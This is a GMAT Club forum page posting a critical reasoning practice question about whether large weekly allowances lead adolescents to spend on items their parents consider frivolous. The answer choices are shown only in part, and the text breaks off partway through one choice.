Calculus and linear algebra? Pipe dream indeed ;) But seriously, what you're talking about sounds a lot like a technical artist, and there are plenty of those out there if you know where to look. We just hired one a few weeks ago. They're basically programmers who also have a good understanding of the art side of development as and can use Max, Photoshop, write scripts, shaders, etc. I don't know if I'd trust a full-blown artist to write shaders though. Shaders can truly be time-critical code if you're GPU-bound, and in my experience artists will use every single feature they possibly can to achieve a better visual effect unless you pull back on the reins a bit. We have a running joke in the graphics department whenever we add a new feature, "don't tell the artists!" :P
Ha, thanks, that was a good buzz word to search for. Yes I think that's what I'm talking about. Let's just train up a small army of technical artists and leave the regular variety to concept art :D
##### Share on other sites
emeyex 382
Quote:
Original post by Numsgil...At the very least an artist should have a basic grounding in calculus and linear algebra...
That's the best line I've heard all year! The funniest part is that you said "at the very least". But seriously, if you do hear that Leonardo da Vinci is looking for a job, let me know, I'd love to hire him :)
##### Share on other sites
Numsgil 501
Quote:
Original post by emeyex
Quote:
Original post by Numsgil...At the very least an artist should have a basic grounding in calculus and linear algebra...
That's the best line I've heard all year! The funniest part is that you said "at the very least". But seriously, if you do hear that Leonardo da Vinci is looking for a job, let me know, I'd love to hire him :)
Yeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
##### Share on other sites
emeyex 382
Quote:
Original post by NumsgilYeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
Nothing wrong with high expectations, I agree that it would be nice! I just wouldn't go designing your pipeline around those expectations :)
##### Share on other sites
Numsgil 501
Quote:
Original post by emeyex
Quote:
Original post by NumsgilYeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
Nothing wrong with high expectations, I agree that it would be nice! I just wouldn't go designing your pipeline around those expectations :)
Probably not. I'm still learning to lower my expectations. I still think choosing a DXT compression level is something an artist can handle, though. There really aren't that many choices: none, DXT1, DXT3, DXT5. That and a texture budget should mean they make the right choice.
##### Share on other sites
frob 44919
Quote:
Original post by Numsgil
Quote:
Original post by emeyex
Quote:
Original post by NumsgilYeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
Nothing wrong with high expectations, I agree that it would be nice! I just wouldn't go designing your pipeline around those expectations :)
Probably not. I'm still learning to lower my expectations. I still think choosing a DXT compression level is something an artist can handle, though. There really aren't that many choices: none, DXT1, DXT3, DXT5. That and a texture budget should mean they make the right choice.
Something they *can* choose? Sure. Any artist could be taught that fairly easily.
Something the *should* choose, every single time the export the art? That's a job for a tool.
##### Share on other sites
Numsgil 501
Quote:
Original post by frob
Quote:
Original post by Numsgil
Quote:
Original post by emeyex
Quote:
Original post by NumsgilYeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
Nothing wrong with high expectations, I agree that it would be nice! I just wouldn't go designing your pipeline around those expectations :)
Probably not. I'm still learning to lower my expectations. I still think choosing a DXT compression level is something an artist can handle, though. There really aren't that many choices: none, DXT1, DXT3, DXT5. That and a texture budget should mean they make the right choice.
Something they *can* choose? Sure. Any artist could be taught that fairly easily.
Something the *should* choose, every single time the export the art? That's a job for a tool.
But how will the tool know what to compress and what to leave in full 32 bits?
##### Share on other sites
swiftcoder 18432
Quote:
Original post by Numsgil
Quote:
Original post by frobSomething the *should* choose, every single time the export the art? That's a job for a tool.
But how will the tool know what to compress and what to leave in full 32 bits?
Heuristics, based on the compression savings, texture budgets, and quality loss (an estimation of which can be calculated by analysing the image).
##### Share on other sites
Numsgil 501
Quote:
Original post by swiftcoder
Quote:
Original post by Numsgil
Quote:
Original post by frobSomething the *should* choose, every single time the export the art? That's a job for a tool.
But how will the tool know what to compress and what to leave in full 32 bits?
Heuristics, based on the compression savings, texture budgets, and quality loss (an estimation of which can be calculated by analysing the image).
Well, it's a fixed compression ratio, so I guess that means the heuristic would just ignore textures under some fixed size. How do you develop a quality loss estimation algorithm? The naive implementation I can think of, basically just comparing pixels and recording the difference, isn't all that effective.
##### Share on other sites
Daaark 3553
Quote:
Original post by NumsgilThe naive implementation I can think of, basically just comparing pixels and recording the difference, isn't all that effective.
Color, brightness, saturation, contrast. There is also edge erosion which is even visible with JPEGs saved at 100%.
##### Share on other sites
Yann L 1802
An FFT can help a lot when comparing image quality by analysing the frequency domain. This can help to estimate the amount of quantization error, bluriness, and high frequency artifacts. Converting to alternative colourspaces, especially those separating chromaticity from brightness (YUV or Yxy, for example) can help at detecting subtile local colour shifts such as those common with DXTC. When combining this with psychovisual profiles, then such a quality estimation can be much more accurate than the subjective guess from a human.
##### Share on other sites
Numsgil 501
Hmm, interesting. Are there any utilities floating around the intraweb that do this (that is, plug in a texture in PNG or something and a desired compression, and get back some sort of score for quality)? Or is this the sort of thing that everyone rolls their own for?
##### Share on other sites
swiftcoder 18432
Quote:
Original post by NumsgilHmm, interesting. Are there any utilities floating around the intraweb that do this (that is, plug in a texture in PNG or something and a desired compression, and get back some sort of score for quality)? Or is this the sort of thing that everyone rolls their own for?
There is an astounding body of research on the subject, but actual tools seem in short supply. The only one I am aware of is for video.
##### Share on other sites
frob 44919
Quote:
Original post by swiftcoder
Quote:
Original post by NumsgilHmm, interesting. Are there any utilities floating around the intraweb that do this (that is, plug in a texture in PNG or something and a desired compression, and get back some sort of score for quality)? Or is this the sort of thing that everyone rolls their own for?
There is an astounding body of research on the subject, but actual tools seem in short supply.
A few high-end numeric algorithms libraries, many computer vision libraries, and most commercial image processing toolkits all include image fidelity computations.
I don't know of any that are free, but I know of an in-house version that works well for us. A quick Google search shows quite a few commercial libraries, and looking at a few shows them around $500 per license, or "call for details" pricing. If you are interested in doing this, finding a professional computer vision or image processing library shouldn't be too hard. Even if you do use some of the computer vision or image processing libraries, image fidelity metrics are not a single number, nor are they generic "plug in your image files engine and get a magical number" systems. They require actual work on your own tool using your own knowledge of what heuristics to use and how to intelligently compare the fidelity metrics. #### Share this post ##### Link to post ##### Share on other sites Numsgil 501 Quote: Original post by frobI don't know of any that are free, but I know of an in-house version that works well for us. A quick Google search shows quite a few commercial libraries, and looking at a few shows them around$500 per license, or "call for details" pricing. If you are interested in doing this, finding a professional computer vision or image processing library shouldn't be too hard.Even if you do use some of the computer vision or image processing libraries, image fidelity metrics are not a single number, nor are they generic "plug in your image files engine and get a magical number" systems. They require actual work on your own tool using your own knowledge of what heuristics to use and how to intelligently compare the fidelity metrics.
Right now our artists export images from photoshop using a free DDS plugin from NVidia, choosing what format to use (DXT1, 3, 5 or uncompressed mostly). If there was a way to have a tool decide intelligently when to compress and when not to, that'd free up some work for our artists. Which would be a good thing. Not something I think we'd want to spend a lot of money on, though.
But, back to this whole coddling artist issue, at some point it would need to come down to a magic number. And they'd still have to be able to add information like "this is far away, so quality doesn't matter" and "this is close up so quality matters" and "this is a cutout where the alpha is very important", etc. So if there is a pre-existing tool that aided the artists in choosing a format (or even was smart enough to really decide entirely by itself), I'd give it a spin. Not something I'm going to want to make myself though.
Well, you just invest the 500 and the man hours to get it up and running. This is a one time cost. The time you'll lose with artists deciding (and correcting potential errors later due to incorrect decisions) are recurring costs. And if we're talking about a commercial game title here, then $500 for a license is pocket change. #### Share this post ##### Link to post ##### Share on other sites Numsgil 501 Quote: Original post by Yann L Quote: Original post by NumsgilI'd also like to point out that when people say things like "don't let your artists decide, make the tools decide automatically", well, if you're tools just make everything a DXT5 because more complex analysis costs$500 plus a month of programmer labor, how's that better?
Well, you just invest the 500 and the man hours to get it up and running. This is a one time cost. The time you'll lose with artists deciding (and correcting potential errors later due to incorrect decisions) are recurring costs. And if we're talking about a commercial game title here, then \$500 for a license is pocket change.
I was thinking more the one programmer man month spent tweaking the heuristic. That's closer to several thousand dollars in time. For an artist, choosing which compression to use is as simple as choosing an item from a drop down box. That's an extra 5 seconds. The item chosen will be remembered for the next round of saving, so let's say something on the order of 20 seconds per texture over the project lifetime. Assuming something on the order of 2000 textures, you're talking maybe 12 hours of work over the lifetime of the project. Even adding in extra time for things like an artist figuring out that normal maps can't be DXT, it just doesn't add up as cost effective.
If there was an existing tool, I'd use it. But I can't see anyone justifying the expense of building such a tool compared with just having an artist save the file as a DDS and load it up in something like DX Texture Tool when they have problems. | 2017-08-23 12:07:58 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1726824939250946, "perplexity": 2064.9791257846978}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886120194.50/warc/CC-MAIN-20170823113414-20170823133414-00446.warc.gz"} |
https://www.physicsforums.com/threads/derviate-x-x-x.193310/ | Derviate x^x^x
1. Oct 23, 2007
erjkism
1. The problem statement, all variables and given/known data
differentiate f(x)= x^x^x
2. Relevant equations
chain rule
product rule
3. The attempt at a solution
x^x (lnx)
i dont know what to do after this
2. Oct 23, 2007
quasar987
A function raised to another function is an exponential:
In general, $$f(x)^{g(x)} = \exp(\ln(f(x)^{g(x)}))=\exp(g(x)\ln(f(x)))$$
And you know how to differentiate an exponential.
So, can you use what I wrote to write x^x^x as an exponential?
3. Oct 23, 2007
arildno
Would that be:
1. $$x^{(x^{x})}=x^{x^{x}}$$
2. $$(x^{x})^{x}=x^{x^{2}}$$
Learn to use parentheses..
4. Oct 24, 2007
HallsofIvy
Staff Emeritus
Don't just leave x^x(ln x) by itself! If f= x^x^x, then ln(f)= x^x ln(x). Now DO IT AGAIN! ln(ln(f))= ln(x^x ln(x))= ln(x^x)+ ln(ln(x))= xln(x)+ ln(ln(x)).
Use the chain rule to differentiate both ln(ln(f(x)) and ln(ln(x)).
5. Oct 25, 2007
Gib Z
I sometimes get annoyed with exponential notation for exactly that reason. My opinion is if the exponent is any larger than 1 term, write it is terms of exp(...).
6. Oct 26, 2007
nizi
Neglecting the given attempt, I put
$$y = x^{x^{x}}$$
$$z = x^{x}$$
and develop as follows.
$$\ln y = \ln x^{x^{x}} = z \ln x$$
$$\frac{y'}{y} = z' \ln x + z \frac{1}{x}$$
here I calculate the differentiation of $$z$$
$$z = x^{x}$$
$$\ln z = x \ln x$$
$$\frac{z'}{z} = \ln x + x \frac{1}{x}$$
$$z' = z \left( { \ln x + 1 } \right) = x^{x} \left( { \ln x + 1 } \right)$$
Accordingly
$$y' = y \left( { x^{x} \left( { \ln x + 1 } \right) \ln x + x^{x} \frac{1}{x} } \right) = x^{x^{x}+x-1} \left( { x \left( { \ln x + 1 } \right) \ln x + 1 } \right)$$ | 2017-02-23 19:10:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8077862858772278, "perplexity": 10339.030771154145}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171209.83/warc/CC-MAIN-20170219104611-00625-ip-10-171-10-108.ec2.internal.warc.gz"} |
http://mathoverflow.net/questions/22211/finiteness-property-of-automorphism-scheme/22596 | # Finiteness property of automorphism scheme
Some time ago I mentioned a certain open question in an MO answer, and Pete Clark suggesting posting the question on its own. OK, so here it is:
First, the setup. Let $X$ be a projective scheme over a field $k$. By Grothendieck, there is a locally finite type $k$-scheme $A = {\rm{Aut}}_ {X/k}$ representing the functor assigning to any $k$-scheme $T$ the group of $T$-automorphisms of $X_T$. (Artin proved a related result with projectivity relaxed to properness, even allowing $X$ to be an algebraic space.) The construction uses Hilbert schemes, so at most countably many geometric connected components can occur.
In some cases the automorphism scheme is connected (such as for projective space, when the automorphism scheme is ${\rm{PGL}}_n$), and in other cases the geometric component group $\pi_0(A) = (A/A^0)(\overline{k})$ can be infinite. For the latter, a nice example is $X = E \times E$ for an elliptic curve $E$ without complex multiplication over $\overline{k}$; in this case $A$ is an extension of ${\rm{GL}}_ 2(\mathbf{Z})$ by $E \times E$, so $\pi_0(A) = {\rm{GL}}_ 2(\mathbf{Z})$. This latter group is finitely presented.
Question: is the geometric component group $\pi_0(A)$ of the automorphism scheme $A$ of a projective $k$-scheme $X$ always finitely generated? Finitely presented? And with projectivity relaxed to properness, and "scheme" relaxed to "algebraic space"?
Feel free to assume $X$ is smooth and $k = \mathbf{C}$, since I believe that even this case is completely wide open.
Remark: Let me mention one reason one might care (apart from the innate appeal, say out of analogy with finite generation of Neron-Severi groups in the general proper case). If trying to study finiteness questions for $k$-forms of $X$ (say for fppf topology, which amounts to projective $k$-schemes $X'$ so that $X'_K = X_K$ for a finite extension $K/k$), then the language of ${\rm{H}}^1(k, {\rm{Aut}}_{X/k})$ is convenient. To get hands on that, the Galois cohomology of the geometric component group intervenes. So it is useful to know if that group is finitely generated, or even finitely presented.
-
Fix an ample class $L$ in Neron-Severi group of $X$. The subgroup of automorphisms sending $L$ to itself is of finite type. So the real question is: what is the image of $Aut(X)$ in $Aut(NS(X))$? Is that finitely generated/presented? These automorphisms permute ample classes, so if the semigroup of ample classes is f.g. (which happens rarely), we are OK. – VA. Apr 22 '10 at 17:40
For minimal surfaces a result of Dolgachev says that (possibly over the complex numbers only) that the image of $\mathrm{Aut}(X)$ in $\mathrm{Aut}(K_X^\perp)$ (the orthogonal complement of the canonical class) is a quotient of a subgroup of finite index of the full automorphism group of that lattice. Hence it is at least finitely generated. The normal subgroup by which one takes the quotient is the subgroup generated by reflections in nodal curves. – Torsten Ekedahl Apr 22 '10 at 17:53
Right. One can look at other features of NS(X) that are preserved. For example for Fanos, the closure of the ample cone is finitely generated, so that leads to the proof. CYs seem like maybe the hardest case. Such a natural question... Must be known, I hope someone answers. – VA. Apr 22 '10 at 21:32
VA, Mumford gave a colloq. talk here today, and after the dinner I mentioned the question. He was intrigued, and said he'd never heard anything about a result in that direction. Mazur wrote a paper with some theoretical arguments for Tate-Shaf. sets which required finite presentation hypotheses on Aut-scheme. In that part he acknowledged assistance from Gabber, to the extent of saying that for some result Gabber weakened the hypothesis to finite generation...but not eliminated it! So seems Gabber thought about it without success. If it is known, I will then be amazed (and very happy). – BCnrd Apr 23 '10 at 3:53
"Mazur wrote a paper ... " On the passage from local to global in number theory. Bull. Amer. Math. Soc. (N.S.) 29 (1993), no. 1, 14--50. – Chandan Singh Dalawat Apr 23 '10 at 5:15
Let us first consider the case of a minimal surface $X$ (by minimal I mean $K_X$ nef). Dolgachev (Dolgachev: Reflection groups in algebraic geometry is a good reference even though the proof is only referenced there not given) gave a kind of structure theorem for the image $A_X$ of $\mathrm{Aut}(X)$ in $\mathrm{Aut}(S_X)$, where $S_X$ is the orthogonal complement of $K_X$ in $\mathrm{NS}(X)$ modulo torsion. His result says that there is a normal subgroup $W_X$ of $\mathrm{Aut}(S_X)$ generated by reflections in $-2$-curves and the group $P_X$ generated by $A_X$ and $W_X$ is a semi-direct product and of finite index in $\mathrm{Aut}(S_X)$. Note that it is possible to have $W_X=\{e\}$ and then $A_X$ itself is of finite index and hence an arithmetic (and thus finitely presented). It is also possible to have $W_X$ of finite index and then $A_X$ is finite (and thus finitely presented). However, there are intermediate cases where both $A_X$ and $W_X$ are infinite. Still $A_X$ is a quotient of $P_X$ and hence is finitely generated. I do not know if it is always finitely presented. Borcherds (Coxeter groups, Lorentzian lattices, and $K3$ surfaces. Internat. Math. Res. Notices 1998) gives examples where it is (and where it is even nicer) but also examples where it is finitely generated but not arithmetic.
I now realise that finite presentation is always true: For that we only need to show that $W_X$ is normally generated in $\mathrm{Aut}(X)$ by a finite number of elements and for that it is enough to show the same thing for $\mathrm{Aut}(S_X)$. We know that $W_X$ is generated by reflections in $-2$-elements. There are however only a finite number of conjugacy classes $-2$-elements. For this it is, by standard lattice theoretic arguments, enough to prove that there are only a finite number of isomorphism classes of orthogonal complements. However, the discriminant of such a complement is bounded in terms of the rank and discriminant of $S_X$ and there are only a finite number of forms of bounded rank and discriminant.
A further step would be to blow up points of $X$ (still assumed minimal). As $X$ is the unique minimal model any automorphism of the blowing up is given by an automorphism of $X$ that permutes the blown up points (and the subgroup fixing the points is commensurable with the full automorphism group). In the case of abelian or hyperelliptic surfaces blowing up just one point is pointless as it just serves to kill off the connected component of $\mathrm{Aut}(X)$ so in that case the first interesting case is blowing up two points.
Consider the case of blowing up two points when $X$ is abelian. So we have two points on $X$ one of which we can assume is $0$ and the other we'll call $x$. An automorphism of $X$ that fixes both of these points will be en automorphism of $X$ as abelian variety that fixes pointwise the closed subgroup $A$ generated by $x$. The group fixing $x$ will then have finite index in the the group fixing $A$ pointwise. For any abelian subvariety $A$ of $X$, the subgroup of $\mathrm{Aut}(X)$ fixing all the points of $A$ is an arithmetic subgroup (in a not necessarily semi-simple group) and in particular is finitely presented.
The same argument works for abelian varieties of any dimension. There one of course also has the option of blowing up positive dimensional varieties, assume $S$ is a smooth closed subvariety. This time the automorphism group is the subgroup of automorphisms $X$ that fixes $S$. We thus get an induced action on $S$ and the kernel of that action has the same structure as before. Unless I am mistaken, the automorphisms of $S$ that extend to $X$ are of finite index in $\mathrm{Aut}(S)$ (look at $\mathrm{Alb}(S) \rightarrow X$ and split it up to isogeny). Hence the finite generation etc for the blowing up is reduced to finite generation for $S$ (and conversely for $X$ replaced by $\mathrm{Alb}(S)$).
Consider now the case of $X$ still minimal but non-abelian or hyper-elliptic and look at blowing up of one point $x$. For a general point of $X$ (in the sense of being outside a countable number of proper subvarieties) the automorphism group is trivial and hence finitely generated. The situation for arbitrary $x$ seems unclear but one thread of the discussion started concerning itself with whether for a general $X$ there is a characterisation (up to commensurability) of $\mathrm{Aut}(X)$ similar to the minimal case: Look at all automorphisms of the integral cohomology of $X$ that preserves multiplicative structure, Hodge structure, Chern classes (of the tangent bundle) and effective cones (spanned by effective cycles). Is the image of the automorphism group of $X$ of finite index in this group? I think the answer is no (and I hope that what I present here is a proof). For that we need to recall some facts on Seshadri constants (Lazarsfeld: Positivity in Algebraic Geometry, I is my reference). Given a point $x$ the Seshadri constants $\epsilon(L;x)$ for $L$ nef (but also for $L$ restricted to be ample) determine (and are determined by) the nef cone of the blowing up at $x$; $L-rE$ is nef precisely when $0\leq r\leq \epsilon(L;x)$. Switching tack, there is a subset $U$ of $X$ which is the intersection of a countable number of open non-empty subsets of $X$ such that $\epsilon(L;x)$ is constant on $U$ for all ample $L$. Indeed, $\epsilon(L;x)$ can be expressed (loc. cit.: 5.1.17) in terms of whether or not $kL$ separates $s$-jets at $x$ and for fixed $k$ and $s$ the separation is true on an open subset.
The conclusion is that there is a $U$ which is the intersection of a countable number of non-empty open subsets for which the nef cone of the blowing up of $X$ at $x$ is independent of $x$ when one expresses it in the decomposition $\mathrm{NS}(X)\bigoplus\mathrm Z E$. If we assume now that $K_X$ is numerically trivial we have that the first Chern class of the tangent bundle of the blowup of $X$ at some $x$ equals $E$ (up to torsion) and hence the group above will preserve the decomposition $\mathrm{NS}(X)\bigoplus\mathrm Z E$ and fix $E$ so come from an automorphism of $\mathrm{NS}(X)$. The only further condition we put on it is that it preserve the nef cone but for $x\in U$ this cone is independent of $x$. As we can further arrange it so that $x\in U \implies \varphi(x)\in U$ (as $\mathrm{Aut}(X)$ is countable) we get that all elements of $\mathrm{Aut}(X)$ give structure preserving automorphisms of the cohomology of the blowup of $X$ at $x$. However, as observed before, at the price of shrinking $U$ we can assume that that the automorphism group of the blowing up is trivial. Hence, if we let $X$ be for instance a K3-surface with infinite automorphism group we get an example. | 2016-06-25 21:19:16 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.91852205991745, "perplexity": 156.04689070653396}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783393533.44/warc/CC-MAIN-20160624154953-00100-ip-10-164-35-72.ec2.internal.warc.gz"} |
https://standards.globalspec.com/std/9887098/iso-2005 | ### This is embarrasing...
An error occurred while processing the form. Please try again in a few minutes.
### This is embarrasing...
An error occurred while processing the form. Please try again in a few minutes.
# ISO 2005
## Rubber latex, natural, concentrate - Determination of sludge content
active, Most Current
Organization: ISO Publication Date: 15 December 2014 Status: active Page Count: 10 ICS Code (Latex and raw rubber): 83.040.10
##### scope:
This International Standard specifies a method for the determination of the sludge content of natural rubber latex concentrate.
The method is not necessarily suitable for latices from natural sources other than Hevea brasiliensis.
It is not suitable for compounded latex or vulcanized latex.
### Document History
ISO 2005
December 15, 2014
Rubber latex, natural, concentrate - Determination of sludge content
This International Standard specifies a method for the determination of the sludge content of natural rubber latex concentrate. The method is not necessarily suitable for latices from natural...
June 1, 1992
Rubber Latex, Natural, Concentrate - Determination of Sludge Content
A description is not available for this item.
January 1, 1992
Rubber Latex, Natural, Concentrate - Determination of Sludge Content
A description is not available for this item. | 2022-09-24 20:21:13 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8735756278038025, "perplexity": 10619.24269874959}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00619.warc.gz"} |
http://viet-anh.vn/194/bai-tap-viet-lai-cau/ | # Bài tập viết lại câu
Arena-multimedia.vn là nơi duy nhất đào tạo Mỹ thuật Đa phương tiện một cách bài bản, toàn diện với giáo trình quốc tế được triển khai đồng bộ trên hơn 300 trung tâm đào tạo trên thế giới.
Bảo hiểm du lịch ở Baohiem24h.net là uy tín nhất đó, mình cũng đã mua bảo hiểm ở đó rồi
Bạn đang cần mua Máy sấy quần áo phải không? Bạn vào Fagor.com.vn nhé ! Chất lượng tốt lắm
1. Your house is bigger than mine.
My house . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2. He did his homework , then he went to bed.
After . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3. Jane doesn’t speak English as well as Peter.
Peter. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
4. DaLat is one of a famous landscapes in Vietnam.I spent my holiday there.
I spent. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5. The manager asked me to come to his office
The manager said. . . . . . . . . . . . . . . . . . . . . . . . . .
6. He asked me where he could find her in that town.
He said . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7. She asked me not to be late.
She said to me . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8. The train couldn’t run because of the snow.
The snow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
9. Nam laughed a lot when I told him the joke.
The joke. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
10. The police continued to watch the house.
The police carried. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
11. Mr. John gave an interesting speech.
Mr. John spoke. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
12. The sight was right in front of him but he didn’t notice it.
Although . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
13. The woman was terribly upset. Her dog was run over.
The woman whose. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
14. Let’s go abroard for our holiday this year.
Why. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
15. I fall asleep as the film was so boring.
I fall asleep because of. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
16. My students are very good at Mathematic.
My students study. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17. This is the most modern building in this area.
No building. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
I had these. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
19. John drives more carefully than his brother.
John’s brother doesn’t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
20. They were such difficult questions that we couldn’t answer them.
The questions were so. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
21. Lan didn’t go to the school last Monday because she was sick.
Because of . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
22. Wy don’t you bring your brother to the party?
I suggest. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Theo Diendan.hocmai.vn
#### Từ khoá liên quan:
• viet lai cau trong tieng anh
• bài tập viết lại câu
• bài tập viết lại câu trong tiếng anh
• cách viết lại câu trong tiếng anh
• bài tập viết lại câu tiếng anh | 2014-10-21 23:57:28 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9881751537322998, "perplexity": 44.095096014095226}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1413507445159.36/warc/CC-MAIN-20141017005725-00306-ip-10-16-133-185.ec2.internal.warc.gz"} |
https://gmatclub.com/forum/child-development-specialists-have-observed-that-adolescents-131540.html | Check GMAT Club Decision Tracker for the Latest School Decision Releases https://gmatclub.com/AppTrack
It is currently 23 May 2017, 20:28
### GMAT Club Daily Prep
#### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email.
Customized
for You
we will pick new questions that match your level based on your Timer History
Track
every week, we’ll send you an estimated GMAT score based on your performance
Practice
Pays
we will pick new questions that match your level based on your Timer History
# Events & Promotions
###### Events & Promotions in June
Open Detailed Calendar
# Child development specialists have observed that adolescents
Author Message
TAGS:
### Hide Tags
Verbal Forum Moderator
Joined: 23 Oct 2011
Posts: 282
Followers: 37
Kudos [?]: 849 [1] , given: 23
### Show Tags
28 Apr 2012, 22:33
1
KUDOS
2
This post was
BOOKMARKED
00:00
Difficulty:
5% (low)
Question Stats:
82% (01:56) correct 18% (01:04) wrong based on 278 sessions
### HideShow timer Statistics
allowances tend to spend money on items considered frivolous by their parents whereas
adolescents who receive small weekly allowances do not. Thus, in order to ensure that their
children do not spend money on frivolous items, parents should not give their children large
weekly allowances. Which of the following pieces of information would be most useful in
evaluating the validity of the conclusion above?
b) Any differences among parents in the standard used to judge an item as frivolous
c) The educational background of the child development specialists who made this observation
d) The difference between the average annual income of families in which the parents give their
children large weekly allowances and that of families in which the parents give their children
